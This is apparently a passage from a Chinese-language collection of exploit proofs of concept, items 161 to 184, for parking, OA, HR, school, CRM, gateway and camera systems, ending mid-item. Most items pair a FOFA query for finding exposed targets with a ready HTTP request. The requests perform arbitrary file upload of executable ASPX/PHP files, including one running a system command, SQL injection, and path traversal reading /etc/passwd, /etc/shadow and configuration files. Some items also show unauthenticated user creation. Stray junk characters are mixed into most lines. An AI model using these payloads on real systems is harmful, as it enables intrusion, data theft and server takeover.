$ O" K9 B; Z9 { I161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传! f2 h% J7 k0 x( ?2 E4 _6 j
FOFA:body="/KT_Css/qd_defaul.css"
A# l1 B! w! H$ z9 J' \" P' B第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密4 A% y* a- M1 ^( F2 B/ ~* c. X# c
POST /Webservice.asmx HTTP/1.17 z. S" d P. }3 c& I" U
Host: x.x.x.x
. \2 o6 i3 {9 X/ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36! |! {# ^% i- Y, W+ I9 P# z( M1 T
Connection: close
0 C6 {7 I9 r0 k" C# nContent-Length: 445
. u* I5 f4 h rContent-Type: text/xml
r k0 l6 a6 g$ p6 X, pAccept-Encoding: gzip6 B" v; y8 G% I2 R0 m& m
3 Q8 O r7 o& |' e9 {, O; ]
<?xml version="1.0" encoding="utf-8"?># l" q, z+ P6 e6 ^2 s
<soap:Envelope xmlns:xsi="
' ]* n: b5 Y! G- mhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"7 L0 I; ]) Y+ J" e! t; y
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
- ^9 {* O$ u) L<soap:Body>+ n: W* {6 N* S: D
<UploadResume xmlns="http://tempuri.org/">+ T! t4 C. [/ ?! W: E1 O0 L9 y/ a
<ip>1</ip>; {# R, d# e' r- Q, |! U/ J
<fileName>../../../../dizxdell.aspx</fileName># c( V1 p6 k1 j# P
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
6 P$ j% ?2 n! c" T<tag>3</tag>0 E6 r9 X/ b. e& ]6 M8 j0 K. \, ?
</UploadResume>$ n2 @- I* ~; \( M: }. x
</soap:Body>, q3 d3 X6 ?' [% R; g& a% ]/ t( E
</soap:Envelope>
" O" L9 S# |0 \) Z* n9 q: n% \# ]. Q8 [
0 N, B9 B/ v& p' Fhttp://x.x.x.x/dizxdell.aspx
7 G/ H [* W* z7 T9 k
F: d8 I, |! u) S3 W162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传4 h% A# M% w6 x0 C/ F
FOFA: app="和丰山海-数字标牌"
2 ?0 I# Y) Z4 iPOST /QH.aspx HTTP/1.16 O* N/ h% Z+ j! {2 g* w
Host: x.x.x.x2 p: {& k7 r5 m X6 p* v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0" m" u7 K* V5 N% I* R! S8 ^
Connection: close
1 \- ]. d5 [* Y8 W p/ GContent-Length: 583
! {, @$ r( i8 }% v- E3 o* R+ H- cContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey( H# l* \3 K. F& `
Accept-Encoding: gzip
' X2 v- E: L, d8 S8 V
& X. R* c; I" v" v4 |5 x: T v------WebKitFormBoundaryeegvclmyurlotuey
( W0 G3 s2 m" { j {" lContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
6 x& X* f& }, K. I4 OContent-Type: application/octet-stream( G8 y+ `* K k6 ]7 d. h
& i, e6 R* Q- f
<% response.write("ujidwqfuuqjalgkvrpqy") %>2 _9 a9 N! j& D: e
------WebKitFormBoundaryeegvclmyurlotuey
. d+ j2 }. R4 w9 @6 g1 mContent-Disposition: form-data; name="action"
# {+ k4 C7 ^; f4 G ?& \; H6 K1 } }/ q) ~; P
upload+ S& f/ \3 l" j- H! S
------WebKitFormBoundaryeegvclmyurlotuey
4 g3 Y7 {7 Q6 GContent-Disposition: form-data; name="responderId"8 V: ?: B$ X* r9 t1 _
3 @3 |" k+ j, z, }ResourceNewResponder; r' o1 Z' ~9 L' Z x& f" q& }, n
------WebKitFormBoundaryeegvclmyurlotuey) r! I" S, A7 l" V! v4 O
Content-Disposition: form-data; name="remotePath"
% E4 k9 e: \6 n$ J0 r2 U
8 m Y5 I- M4 B3 w9 M4 K, [/opt/resources+ \$ t& r5 w( o2 y G; L0 L: o; y! j
------WebKitFormBoundaryeegvclmyurlotuey--
9 k6 g$ E+ O' f( X
% q. H) N" ]8 q6 g: ]2 W
4 g5 [0 K5 M5 U' D/ L1 n( ?http://x.x.x.x/opt/resources/kjuhitjgk.aspx
" O. Q# h& h$ f
- ^# A& i. J. A o0 B# L/ [163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
, C$ N: ~' i; h& b1 [0 m- N7 _FOFA: icon_hash="-795291075"
4 F) k0 x6 u/ ^, y/ CPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
8 d1 ?# G- P- E) N! OHost: x.x.x.x
9 T& d) _* q- Q# nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36" v$ G$ ?, m, C6 {
Connection: close
+ X, {: Z2 |0 f1 z- ^& hContent-Length: 2937 R" s3 c$ h1 I7 M8 ?& Q
Accept: */*- m) x1 i( c( K( \8 J8 Y- w
Accept-Encoding: gzip, deflate
5 _( r7 f4 K, `# E/ w% E* E. gAccept-Language: zh-CN,zh;q=0.9
2 T( f/ v+ d; G$ X! u. M) q( pContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod; I. T5 x" t; M7 N" S: v3 V: E
. V0 _* D2 ^, @1 v I4 E/ {& _------iiqvnofupvhdyrcoqyuujyetjvqgocod, c: _& A. p b+ b* Z
Content-Disposition: form-data; name="name"
) j9 }4 P4 p9 q0 h9 Z, u6 R6 U) @. T+ l4 E/ r+ b
1.php, g( |% ?0 j5 R8 i6 K
------iiqvnofupvhdyrcoqyuujyetjvqgocod9 W- s9 v* P% w4 f
Content-Disposition: form-data; name="upfile"; filename="1.php"$ c" s0 c8 t# P) ^; x, N
Content-Type: image/jpeg! i! \4 W8 R2 U% ]
' i- n f; X! mrvjhvbhwwuooyiioxega$ {$ {- e; a2 x3 T" v% g
------iiqvnofupvhdyrcoqyuujyetjvqgocod--: M7 C- r( B# D; w( N; k& y
5 D% k5 `2 f+ f8 ^8 g
) r/ C% L/ V0 J9 t* C8 }! P
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传, m* a8 g" E2 `6 U
FOFA: title="智慧综合管理平台登入"
) I, s h( ?7 c+ M aPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
/ B2 g. Q1 a; b }, q; _( ]) aHost: x.x.x.x
, I T7 C& h, Q" ^6 F) wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.09 A* k( j! W7 ?
Content-Length: 288
$ g" u2 w$ m4 t" JAccept: application/json, text/javascript, */*; q=0.01# |! E8 Y! Z; A% t0 F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
2 x+ \+ S1 _: R$ MConnection: close4 A0 D7 B" W* ]& y
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
5 K/ O$ h' B. o8 I, uX-Requested-With: XMLHttpRequest: X7 I+ N M' T
Accept-Encoding: gzip: q# a1 }. T% q; U( b
7 b6 ^( \3 {# P+ n------dqdaieopnozbkapjacdbdthlvtlyl
! V9 z' x3 q/ O Y! Q' eContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"7 w* j+ x( f3 |6 b" B" n
Content-Type: image/jpeg
) h$ I4 p- [6 I; i7 s/ P+ Y& D) O! [- h/ Q6 x" C
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>2 y0 l4 G9 b6 ~& y5 {3 P+ a& O9 W
------dqdaieopnozbkapjacdbdthlvtlyl--
' @. H9 T" b0 D6 o: G; M, b p2 {8 f* |6 O4 Z5 L# q8 F) F1 q) R' m
7 ~, C' T8 L6 _" m2 p5 E& ^+ Xhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx; T0 h7 y& K" \; c" S
3 }- q4 q$ m/ l4 v165. OrangeHRM 3.3.3 SQL 注入 r* L% B4 E8 ]7 C
CVE-2024-36428
& U [ X$ z" E0 J9 {FOFA: app="OrangeHRM-产品"; H ?. j0 X$ Y$ Y9 U4 d
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
4 v& o- l& g8 M" a8 X# T- W/ K+ m+ q* Q) a
; U0 a: N# ^6 e% G
166. 中成科信票务管理平台SeatMapHandler SQL注入
; E0 w( }" R/ t6 e. F( c+ U8 `FOFA:body="技术支持:北京中成科信科技发展有限公司"
" C7 J' U( Q, Z6 p" OPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
% U) q3 k+ B( ~2 J: C+ wHost:
. b! n' m% ^ S$ M- c- Y2 ~! B" bPragma: no-cache
: X# E4 s' t5 P3 t7 l* g. `8 g( ECache-Control: no-cache
5 j- F9 N$ i: V$ X7 K2 G' aUpgrade-Insecure-Requests: 16 A1 [7 K9 a. [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
$ c8 S$ u6 {' K1 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ L$ t# E! M2 u; i7 l% k
Accept-Encoding: gzip, deflate; `% C! [; j" h" R3 d" E: s
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8! b- B s$ A3 P' }
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE+ s; ]# z2 d7 c; g' m! C2 I6 ^
Connection: close
2 d8 j f; J B+ V6 u+ J* H YContent-Type: application/x-www-form-urlencoded/ }, I) E! V( N
Content-Length: 89
8 X' _' \ f7 `+ @" L0 u1 q8 E3 O1 L$ }2 o
! j7 g6 D$ U/ l$ B) sMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE5 {/ {3 c; m" u) {
# q4 I, H' k( K# Z1 u6 g1 U
& d' ?, _ @ i
167. 精益价值管理系统 DownLoad.aspx任意文件读取8 Z. l8 X! s2 ?. _4 Y
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
) Y' t6 _' _$ zGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1- B' v' I" \: ^7 r% J; }1 Q
Host:
: m7 }5 k/ B A) K5 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 ?, F$ [8 b. z& t# f$ ~7 s9 j
Content-Type: application/x-www-form-urlencoded
5 b( w \8 X( jAccept-Encoding: gzip, deflate
6 M( D$ Y0 x+ o# DAccept: */*
: L5 k+ n# C1 v' j% vConnection: keep-alive8 C" y' `2 Z$ _6 ?2 a
7 O- B$ ]: y+ T% [# {; B; X" y
9 z& `( F- L, k1 }' ^5 r) Y168. 宏景EHR OutputCode 任意文件读取3 q6 {4 G2 F. N: X6 o' `+ B
FOFA:app="HJSOFT-HCM"9 N5 @# Q$ t! ~+ K
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1' W* K8 X3 G9 @$ v6 u! w
Host: your-ip
, H, c) C/ Q6 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
o# W, W) Q) g) \2 HContent-Type: application/x-www-form-urlencoded
# A# {! Z: w) a, i2 L3 FConnection: close' j# q Q' `: w
0 s/ b- \7 T9 D% b- g: ~; j3 a8 n( A' C: i0 T
' H! K2 N; z: u+ w169. 宏景EHR downlawbase SQL注入. R0 l' J K( L5 g3 `1 \
FOFA:app="HJSOFT-HCM"4 N m" Q g! _( [2 E+ m u6 V
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
" t; i. f) |" LHost: your-ip! M! y' }9 I. p' F5 {1 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% t2 A& ~2 _. OAccept: */*. H! t+ [. b9 L% [* K
Accept-Encoding: gzip, deflate3 Y$ ~! u# |6 K6 y3 l4 A
Connection: close
; q" f0 o3 g8 h$ [
2 `7 z7 o8 j) T H
}+ _7 N0 W, n `9 U t4 s. X$ y( V( ]+ O1 N% A: e
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
5 o7 c7 M3 g( WFOFA:body="/general/sys/hjaxmanage.js"
, I* E( L% T& B" T. J: C# t8 aPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
; q6 M0 f6 v! u* L) p8 aHost: balalanengliang) Q5 p+ @; z" s4 i" L @: D* f) u
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, z. l$ O4 o, g! X$ x8 m9 J
Content-Type: application/x-www-form-urlencoded
# k6 q8 ^+ u+ a
6 L) k* L" [1 `2 _0 Wfilename=../webapps/ROOT/WEB-INF/web.xml( I: p, L$ J! ^
2 _+ d9 p( x) p) K% [
3 S4 h: X- p9 y) l# A- m171. 通天星CMSV6车载定位监控平台 SQL注入
3 U/ Q$ A( D! h: }FOFA:body="/808gps/"
( w3 A- _& E, i a8 g' A6 ZGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1+ o4 h3 N) W8 n, B/ i# ] G
Host: your-ip
5 Y, }$ m" b! `, g* w! oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.06 Y) M* }9 L) h5 s& T k# L2 R, z
Accept: */** g9 ~7 j( Z' T# h2 J7 E U; V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 _* E9 \9 H$ IAccept-Encoding: gzip, deflate7 E: e+ I- A: y0 K' G" Z
Connection: close9 `4 P& i& ?: g& d9 r" D5 H
0 C9 p/ ^7 r8 y7 _! Z% f$ F
7 b: D" U1 S' E7 c9 Z, r! D1 _ ^ K) N* g% h: Q% T# l& I
172. DT-高清车牌识别摄像机任意文件读取9 t6 W+ E& u& F1 t
FOFA:app="DT-高清车牌识别摄像机"0 u: V0 v3 q4 K. F
GET /../../../../etc/passwd HTTP/1.1
* q4 X7 q! a; B) yHost: your-ip
J# q N3 C4 w7 T; l' HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 ?# c, G9 I$ X1 L+ UAccept-Encoding: gzip, deflate/ X$ i4 C0 A: i: c. q! a
Accept: */*% s+ Q' e3 ?: e' N! d
Connection: keep-alive
1 B' T4 r! X" m# Q& z/ S3 ?1 M
2 ^1 ~$ y5 J9 c
5 R& | D- _6 B3 r+ T/ |
6 Q- Z4 t' U* u9 t. B173. Check Point 安全网关任意文件读取
& @5 S' n, K V+ @CVE-2024-24919
@, ], {" t2 ?, m# ~FOFA:app="Check_Point-SSL-Network-Extender"
4 E' h \9 l0 u$ A1 j* Z6 g5 uPOST /clients/MyCRL HTTP/1.17 y- v4 \4 k' C+ w& m7 T
Host: your-ip' S# g4 X2 G$ K* S% H O6 |. `( s6 i
Content-Type: application/x-www-form-urlencoded
, z2 D4 m5 ? Q( z
( \0 k8 v, G c5 l9 X" R6 LaCSHELL/../../../../../../../etc/shadow
4 L5 i" v9 V/ G/ \- J& E: L3 W; O" P+ s4 C
9 N c/ E/ w6 \) K) e5 x4 o
! u, y% {% W# `, o' _- i' P% h- u- X! ^0 e174. 金和OA C6 FileDownLoad.aspx 任意文件读取
$ [7 @3 R; `) }) a& QFOFA:app="金和网络-金和OA"1 N+ T, ~( H' ?$ y) }
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
+ }- A8 \" F! b8 E& X* SHost: your-ip
* X q$ ^- o6 e6 y" JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 L8 i6 y, s U9 Y4 u9 |0 ~: S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 X! H2 _& H: G/ f5 r- [3 q: |- _
Accept-Encoding: gzip, deflate, br% u+ S8 l( l: M9 B6 B7 O( ?4 A
Accept-Language: zh-CN,zh;q=0.95 r& n' c. P S* T* P
Connection: close
# C! d3 z% m+ J$ Y5 `7 c3 J/ ^
& E0 _0 i2 J" r8 ?+ D0 T: @# X# L: d3 E0 s! F- u$ V* Y9 E! m
% F4 d$ F; A1 r, P) O; _$ e175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入% k1 \9 j' w. L" K j
FOFA:app="金和网络-金和OA", h5 U9 q7 {" w f+ k
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
6 o, e% b: E$ _, r, RHost:
8 s8 [2 W B0 }# v0 n8 t% qUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 j* f' `* g7 A2 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# V; x) o+ \" V* R9 l2 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 |: b: J8 Q3 z, i3 Y+ d( l, K$ M5 \2 d
Accept-Encoding: gzip, deflate8 `. ?# y' `4 y, t' @' o1 x
Connection: close
/ O# g/ u( a5 jUpgrade-Insecure-Requests: 1) @, f$ M4 D e/ l4 J6 ]7 q
5 }5 U) G `$ N7 N4 b8 v( k
; _$ D$ E2 K( g1 p \& K% _- I: e( w/ z176. 电信网关配置管理系统 rewrite.php 文件上传6 t7 _# g) q. E7 ~0 L
FOFA:body="img/login_bg3.png" && body="系统登录"2 v$ l4 [- ]- I0 S9 o9 A3 Y% j
POST /manager/teletext/material/rewrite.php HTTP/1.1, Q" r7 a: S; j+ x5 @$ `
Host: your-ip/ ?" B8 V2 j# [% ?* Y6 m* }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0* [9 d2 V& y; n) Q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
7 m, o" |" N& X4 I& ]9 ]8 i* HConnection: close/ H) h' ~8 `8 ?2 A9 q
% H" L+ i0 X$ I y/ _, p- ]( S
------WebKitFormBoundaryOKldnDPT
5 ^! } E2 x& _! E$ C0 }& aContent-Disposition: form-data; name="tmp_name"; filename="test.php"
# m6 [& r, ]* }Content-Type: image/png
) c+ @; A, ]' M% r! ~# F
0 V% r5 h. N2 \<?php system("cat /etc/passwd");unlink(__FILE__);?>
3 K+ `/ M8 V$ A. x------WebKitFormBoundaryOKldnDPT* y2 M4 r" P$ V' K
Content-Disposition: form-data; name="uploadtime": _$ X$ y9 d& ~5 R
4 A, S& q- H1 F3 q
4 H: d) h/ U& ~) i' i
------WebKitFormBoundaryOKldnDPT--! f1 L9 v- r8 B
' l& v6 s0 C: A1 J
& ]3 z" D$ A( ~/ S" Z9 V
/ K. G" U3 v- i/ n# t( P. p$ a177. H3C路由器敏感信息泄露1 J6 W9 u g1 V8 s+ ^
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg0 g3 Z3 {* w) I% n3 L7 p' |
/userLogin.asp/../actionpolicy_status/../M60.cfg# H, j5 n0 t* a. I
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
* A0 I# D/ ?) h& n) q5 s8 e Z/userLogin.asp/../actionpolicy_status/../GR5200.cfg' E1 {1 J/ N& I% `& I- {
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
5 Y7 G9 s. D/ w, W; b7 |7 V/userLogin.asp/../actionpolicy_status/../GR2200.cfg
1 c* ]0 K4 \+ \/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
9 G, U+ f+ g; ^1 ]/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg& Z! B* M- s& t- S* V4 [
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg# f" E( o' F, O) L+ h
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg( Z1 v2 ^$ D9 l. T5 ]: M
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
2 w( @( X( F6 x5 g# @: E/userLogin.asp/../actionpolicy_status/../ER5100.cfg8 _4 E3 P5 c: I- ]# m
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
: K4 |. x& Z! \9 d2 b- H: p/userLogin.asp/../actionpolicy_status/../ER3260.cfg+ E" e) \. h4 [
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg: G6 e6 P# m4 W% R6 _
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
0 C: o; h# G! O/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
, |/ T! N; a: G/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
. k5 A- x- x+ w/ {' R* @/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg) x( K7 ]5 p9 a5 v( v) j% }6 U7 S) w. K
/userLogin.asp/../actionpolicy_status/../ER3100.cfg# ?9 O3 x! B- U' y" f' K
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
4 ~2 u. T' d! U7 Y/ n. Z" b7 H% b3 x- Z$ E# ]
# q9 [: I& j% ^ D
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
, H2 o9 V5 H, g* o8 I( |2 }" jFOFA:header="/selfservice"
) i5 i+ u* N3 RPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1; r; E# v! V6 H0 V5 Z
Host:1 [# l: E+ B! \7 p1 O3 M8 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36( U. c) ^; i- d
Content-Length: 2524 T0 \- Z& R9 S- l7 `" f( b
Accept-Encoding: gzip, deflate
# S- [/ y; O O: I! g0 MConnection: close6 q$ {% b2 n6 Y6 n
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
% P) o4 H% ?# t, ~8 h6 V' o5 {8 P-----------------aqutkea7vvanpqy3rh2l6 P. I; z: d1 W8 @5 w9 R; l1 Y
Content-Disposition: form-data; name="12234.txt"; filename="12234" T* I; ?. F/ @- K
Content-Type: application/octet-stream
% j( `5 a) c5 X! `Content-Length: 2556 D/ w; h; ~4 C3 P- q6 b. A
1 c$ b3 \ C; k3 r12234; _8 c7 a8 U' D: ~% l! y; C
-----------------aqutkea7vvanpqy3rh2l--5 V9 i$ J* X v' ~
; K: M3 C2 L0 D. w) |
" J: V* r2 h& r! S- F* {% {+ W0 aGET /imc/primepush/%2e%2e/flex/12234.txt3 x1 M( m6 ]! x# v! v# F% s
0 K8 p* m- _, X6 l* L, B
# u, z/ f1 q* V" f& l( h' `' ]
179. 建文工程管理系统存在任意文件读取3 n0 ^& c3 ~8 W
POST /Common/DownLoad2.aspx HTTP/1.17 {; `$ s: p0 m( s# g& c( k
Host: {{Hostname}}
4 W" [7 A- \/ N: k& `Content-Type: application/x-www-form-urlencoded
' y9 V: q- N) y( ~7 @User-Agent: Mozilla/5.0
) O* ^$ ?/ i+ O8 c0 w1 G9 S2 p/ p# ]9 b
path=../log4net.config&Name=' {" f& m: P, r
, j! V/ p& \& Q9 ~3 v4 t% g
3 _/ I: H# b1 g& I+ C8 g; l
180. 帮管客 CRM jiliyu SQL注入
" T* t# S" J: w6 CFOFA:app="帮管客-CRM"+ w6 v6 E' E! H2 R
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
! W+ |: B9 E+ mHost: your-ip5 S- U$ w& l) V+ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 m3 M) k) \ `5 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) Z+ E! l6 C: ~! B' m
Accept-Encoding: gzip, deflate3 s g P. e; K8 y3 c4 [
Accept-Language: zh-CN,zh;q=0.9
! B/ H' [$ l0 b0 P7 BConnection: close: x( T8 R0 Y- h l+ Z
* B% T8 _ h2 n, ^) i# j
' O4 I' f7 _- U; G7 J181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
- Z1 O @ _& L- }6 ]6 fFOFA:"PDCA/js/_publicCom.js"
$ L4 Q" T/ J$ }' N% S" mPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
* ]4 p" @' T, b0 }Host: your-ip
' O, e# t! F0 w: @( A, ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ t0 A/ A2 |8 l: Z* BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 Y# I/ ~. s G# M+ F1 c/ d/ I3 U a
Accept-Encoding: gzip, deflate, br
' Z, J T; o% P+ a$ t- K0 V, qAccept-Language: zh-CN,zh;q=0.9
7 @2 g! j2 B+ M7 x7 ]% `6 QConnection: close$ B: F0 G8 V, n6 M5 @4 F
Content-Type: application/x-www-form-urlencoded
' V' M, z# q& l z7 T- m! |
8 ~: a: Q9 S, q* \( T: e4 G+ C$ z1 m c6 y- @
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20. }5 f) v1 _ G7 j
% O; R9 y0 f" D& N v: }% x
4 O1 c6 D3 g, {0 P! h' k( v5 K182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
# @1 z+ s! P, Y0 w) w8 ]" {FOFA:"PDCA/js/_publicCom.js") q# p0 U# ^, g, b
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.10 E& }' r5 e; b2 H6 q
Host: your-ip% {) `1 Y" O+ ^/ t3 b1 R5 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.360 I: I# b1 d* \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" X8 j' ^! G* X- A9 m# B' FAccept-Encoding: gzip, deflate, br
+ S! { I4 ^: r6 iAccept-Language: zh-CN,zh;q=0.94 @' w% e1 J. H
Connection: close7 ]% _9 o9 ^7 l( a& o" V9 p( e
Content-Type: application/x-www-form-urlencoded
% k& [2 K; s# w! V6 _! @, i. X3 P2 S. ?3 \! P$ ]" ~) K( O8 B
0 z& S, S2 T: c) x' Y9 q# I
username=test1234&pwd=test1234&savedays=1/ a: e0 M* g( m) c, x9 S8 g
0 C3 F9 _. L5 G/ s4 ?
3 W1 s4 S6 M2 t
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
& X' F. f1 q5 z3 n; a- TFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
! ^5 ? j4 ^. B: | v; uGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1* b& B" e4 n% [* |4 j
Host: your-ip
$ T6 r4 L0 q/ G! PUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36' @/ _9 B, p' b1 ~$ ~
Accept-Charset: utf-8
* u7 }: M) L3 L1 E- a% RAccept-Encoding: gzip, deflate
. ]" h% {! M1 h5 p9 z# @Connection: close
) r5 m( ^4 g' Z+ m( e. K$ f# F
/ Q; K/ ~( T c: V0 \6 E0 H: y J0 C3 R! Y9 Y
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
$ r8 ]* M$ ]& D+ \( n0 H* |- D, jFOFA:server="SunFull-Webs"
* H4 v, t! W x4 b! VPOST /soap/AddUser HTTP/1.1
4 t& b" j) O: p9 k5 eHost: your-ip* V/ V$ M9 y1 \
